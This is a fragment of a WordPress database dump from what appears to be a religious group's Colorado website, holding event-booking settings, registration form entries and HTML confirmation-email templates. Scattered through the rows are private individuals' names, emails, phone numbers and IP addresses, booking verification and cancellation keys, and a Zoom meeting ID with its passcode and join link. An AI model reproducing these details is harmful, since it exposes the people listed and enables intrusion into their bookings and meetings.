10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(171677,267368,'original-file','2022/10/info-security-2-updraft-pre-smush-original.jpg'),(171678,267368,'smush-complete','1'),(171679,267368,'smush-info','The file was compressed from 90.57 KB to 87.05 KB saving 3.88 percent using WP-Optimize'),(171680,267368,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:92741;s:12:\"smushed-size\";i:89141;s:15:\"savings-percent\";d:3.88;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:92741;s:10:\"compressed\";i:89141;}s:6:\"medium\";a:2:{s:8:\"original\";i:16618;s:10:\"compressed\";i:16460;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7363;s:10:\"compressed\";i:7297;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:24762;s:10:\"compressed\";i:24571;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:39732;s:10:\"compressed\";i:39332;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:26916;s:10:\"compressed\";i:26679;}s:8:\"tileview\";a:2:{s:8:\"original\";i:32005;s:10:\"compressed\";i:31727;}}}'),(171689,267382,'_field_224','Veronica'),(171690,267382,'_field_225','Garner'),(171691,267382,'_field_226','sunnjeep@yahoo.com'),(171692,267382,'_field_227','CO'),(171693,267382,'_field_228','US'),(171694,267382,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(171695,267382,'_form_id','21'),(171696,267382,'_seq_num','158'),(191520,269018,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(191519,269018,'mec_hourly_schedules','a:0:{}'),(191518,269018,'mec_not_in_days',''),(191516,269018,'mec_advanced_days','a:0:{}'),(191517,269018,'mec_in_days',''),(191515,269018,'mec_repeat_end_at_date',''),(191514,269018,'mec_repeat_end_at_occurrences',''),(191513,269018,'mec_repeat_end',''),(191512,269018,'mec_repeat_interval','1'),(191511,269018,'mec_repeat_type',''),(191510,269018,'mec_repeat_status','0'),(191509,269018,'mec_end_day_seconds','41400'),(191508,269018,'mec_end_time_ampm','AM'),(191507,269018,'mec_end_time_minutes','30'),(191506,269018,'mec_end_time_hour','11'),(191505,269018,'mec_end_date','2023-09-24'),(191503,269018,'mec_start_time_ampm','AM'),(191504,269018,'mec_start_day_seconds','37800'),(191502,269018,'mec_start_time_minutes','30'),(191501,269018,'mec_start_time_hour','10'),(191500,269018,'mec_start_date','2023-09-24'),(191499,269018,'mec_public','1'),(191497,269018,'mec_timezone','global'),(191498,269018,'mec_countdown_method','global'),(191496,269018,'mec_comment',''),(191495,269018,'mec_hide_end_time','0'),(191494,269018,'mec_hide_time','0'),(191493,269018,'one_occurrence','0'),(191492,269018,'mec_allday','0'),(191491,269018,'mec_certain_weekdays','a:0:{}'),(191490,269018,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(191489,269018,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-24\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-24\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(191488,269018,'mec_additional_location_ids','a:0:{}'),(191487,269018,'mec_additional_organizer_ids','a:0:{}'),(191486,269018,'mec_currency','a:0:{}'),(191485,269018,'mec_cost',''),(191484,269018,'mec_more_info_target','_self'),(191483,269018,'mec_more_info_title',''),(191482,269018,'mec_more_info',''),(191481,269018,'mec_read_more',''),(191480,269018,'mec_organizer_id','1'),(191479,269018,'mec_dont_show_map','0'),(191478,269018,'mec_location_id','122'),(191477,269018,'mec_color',''),(173137,267550,'mec_verification_key','4aefe04f6b51638ba703627c0c7b341d'),(173135,267550,'mec_user_id','1000055'),(173136,267550,'mec_verified','1'),(173134,267550,'mec_transaction_id','SCQ96323'),(191761,269098,'boldgrid_hide_page_title','0'),(191762,269098,'boldgrid_in_page_containers','1'),(191763,269098,'_dp_original','267647'),(191764,269098,'_edit_lock','1695058629:2'),(191766,269099,'_field_652','Gardner'),(191767,269099,'_field_653','lynnie626@gmail.com'),(191768,269099,'_field_651','(801) 755-5330'),(191769,269099,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(191770,269099,'_field_649','Alberto, I believe you are the Arahata and I will be joining your class. Lynn'),(191771,269099,'_form_id','61'),(191772,269099,'_seq_num','6'),(171790,267395,'mec_transaction_id','KLW43515'),(171791,267395,'mec_user_id','1000050'),(171792,267395,'mec_verified','1'),(171793,267395,'mec_verification_key','cb4bbba76b7edf73c2b0b161de0cc208'),(171794,267395,'mec_cancellation_key','489f1fe125cdaeb2dbf25bb108003644'),(171795,267395,'mec_confirmed','1'),(171796,267395,'mec_event_id','267334'),(171797,267395,'mec_date','1667730600:1667777400'),(171798,267395,'mec_ticket_id',',1,'),(171799,267395,'mec_booking_time','2022-10-29 11:05:59'),(171800,267395,'mec_all_dates','a:0:{}'),(171801,267395,'mec_other_dates','a:0:{}'),(171802,267395,'mec_attention_time','1667730600:1667777400'),(171803,267395,'mec_attention_time_start','1667730600'),(171804,267395,'mec_attention_time_end','1667777400'),(171805,267395,'mec_book_date_submit','20221029110559'),(171806,267395,'mec_booking_location','118'),(171807,267395,'mec_ticket_price_1','0'),(171808,267395,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(171809,267395,'mec_price','0'),(171810,267395,'mec_gateway','MEC_gateway_free'),(171811,267395,'mec_gateway_label','Free'),(191773,269101,'_field_654','Mary V'),(191774,269101,'_field_652','Williams'),(191757,269092,'original-file','2023/09/web-promo-bk-6-updraft-pre-smush-original.jpg'),(171852,267401,'_field_133','Susann'),(171853,267401,'_field_134','Arroyo'),(171854,267401,'_field_135','susanm.arroyo@yahoo.com'),(171855,267401,'_field_137','Satsang registration'),(171856,267401,'_field_138','I am trying to enroll in Soul Travel 2 but was unable ti,'),(171857,267401,'_form_id','13'),(171858,267401,'_seq_num','121'),(173195,267554,'mec_start_time_ampm','AM'),(173194,267554,'mec_start_time_minutes','30'),(173192,267554,'mec_start_date','2022-12-11'),(173193,267554,'mec_start_time_hour','10'),(173191,267554,'mec_public','1'),(173189,267554,'mec_timezone','global'),(173190,267554,'mec_countdown_method','global'),(173188,267554,'mec_comment',''),(191758,269092,'smush-complete','1'),(191759,269092,'smush-info','The file was compressed from 263.44 KB to 253.07 KB, saving 3.94 percent, using WP-Optimize'),(191760,269092,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:269765;s:12:\"smushed-size\";i:259144;s:15:\"savings-percent\";d:3.939999999999999946709294817992486059665679931640625;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:269765;s:10:\"compressed\";i:259144;}s:6:\"medium\";a:2:{s:8:\"original\";i:11910;s:10:\"compressed\";i:11767;}s:5:\"large\";a:2:{s:8:\"original\";i:79859;s:10:\"compressed\";i:77999;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7327;s:10:\"compressed\";i:7261;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:47720;s:10:\"compressed\";i:46578;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23853;s:10:\"compressed\";i:23721;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:58120;s:10:\"compressed\";i:57646;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:43173;s:10:\"compressed\";i:42552;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:30538;s:10:\"compressed\";i:30046;}s:8:\"tileview\";a:2:{s:8:\"original\";i:27658;s:10:\"compressed\";i:27632;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:160486;s:10:\"compressed\";i:157283;}}}'),(171886,267406,'mec_transaction_id','QTD92990'),(171887,267406,'mec_user_id','1000051'),(171888,267406,'mec_verified','1'),(171889,267406,'mec_verification_key','d615bb83183bf8a82aede314403a82cb'),(171890,267406,'mec_cancellation_key','1b72572510041c797db46256ab4e6296'),(171891,267406,'mec_confirmed','1'),(171892,267406,'mec_event_id','267334'),(171893,267406,'mec_date','1667730600:1667777400'),(171894,267406,'mec_ticket_id',',1,'),(171895,267406,'mec_booking_time','2022-10-31 22:26:15'),(171896,267406,'mec_all_dates','a:0:{}'),(171897,267406,'mec_other_dates','a:0:{}'),(171898,267406,'mec_attention_time','1667730600:1667777400'),(171899,267406,'mec_attention_time_start','1667730600'),(171900,267406,'mec_attention_time_end','1667777400'),(171901,267406,'mec_book_date_submit','20221031222615'),(171902,267406,'mec_booking_location','118'),(171903,267406,'mec_ticket_price_1','0'),(171904,267406,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"rumipaz@gmail.com\";s:4:\"name\";s:12:\"Alberto Ruiz\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"136.36.92.194\";}}'),(171905,267406,'mec_price','0'),(171906,267406,'mec_gateway','MEC_gateway_free'),(171907,267406,'mec_gateway_label','Free'),(191808,269105,'_field_651','(435) 632-7454'),(191809,269105,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(191810,269105,'_field_649',''),(191811,269105,'_form_id','61'),(191812,269105,'_seq_num','11'),(194043,269259,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-11-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171916,267408,'mec_color',''),(171917,267408,'mec_location_id','129'),(171918,267408,'mec_dont_show_map','0'),(171919,267408,'mec_organizer_id','1'),(171920,267408,'mec_read_more',''),(171921,267408,'mec_more_info',''),(171922,267408,'mec_more_info_title',''),(171923,267408,'mec_more_info_target','_self'),(171924,267408,'mec_cost',''),(171925,267408,'mec_currency','a:0:{}'),(171926,267408,'mec_additional_organizer_ids','a:0:{}'),(171927,267408,'mec_additional_location_ids','a:0:{}'),(171928,267408,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-13\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171929,267408,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171930,267408,'mec_certain_weekdays','a:0:{}'),(171931,267408,'mec_allday','0'),(171932,267408,'one_occurrence','0'),(171933,267408,'mec_hide_time','0'),(171934,267408,'mec_hide_end_time','0'),(171935,267408,'mec_comment',''),(171936,267408,'mec_timezone','global'),(171937,267408,'mec_countdown_method','global'),(171938,267408,'mec_public','1'),(171939,267408,'mec_start_date','2022-11-13'),(171940,267408,'mec_start_time_hour','10'),(171941,267408,'mec_start_time_minutes','30'),(171942,267408,'mec_start_time_ampm','AM'),(171943,267408,'mec_start_day_seconds','37800'),(171944,267408,'mec_end_date','2022-11-13'),(171945,267408,'mec_end_time_hour','11'),(171946,267408,'mec_end_time_minutes','30'),(171947,267408,'mec_end_time_ampm','PM'),(171948,267408,'mec_end_day_seconds','84600'),(171949,267408,'mec_repeat_status','0'),(171950,267408,'mec_repeat_type',''),(171951,267408,'mec_repeat_interval','1'),(171952,267408,'mec_repeat_end',''),(171953,267408,'mec_repeat_end_at_occurrences',''),(171954,267408,'mec_repeat_end_at_date',''),(171955,267408,'mec_advanced_days','a:0:{}'),(171956,267408,'mec_in_days',''),(171957,267408,'mec_not_in_days',''),(171958,267408,'mec_hourly_schedules','a:0:{}'),(171959,267408,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171960,267408,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(171961,267408,'mec_fees_global_inheritance','1'),(171962,267408,'mec_fees','a:0:{}'),(171963,267408,'mec_ticket_variations_global_inheritance','1'),(171964,267408,'mec_ticket_variations','a:0:{}'),(171965,267408,'mec_reg_fields_global_inheritance','1'),(171966,267408,'mec_reg_fields','a:0:{}'),(171967,267408,'mec_bfixed_fields','a:0:{}'),(171968,267408,'mec_op','a:0:{}'),(171969,267408,'mec_fields','a:0:{}'),(171970,267408,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:4801:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><strong><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\"><br />\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid rgba(201, 201, 207, 0.35); border-top-color: rgba(201, 201, 207, 0.35); border-right-color: rgba(201, 201, 207, 0.35); border-left-color: rgba(201, 201, 207, 0.35); text-align: left;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          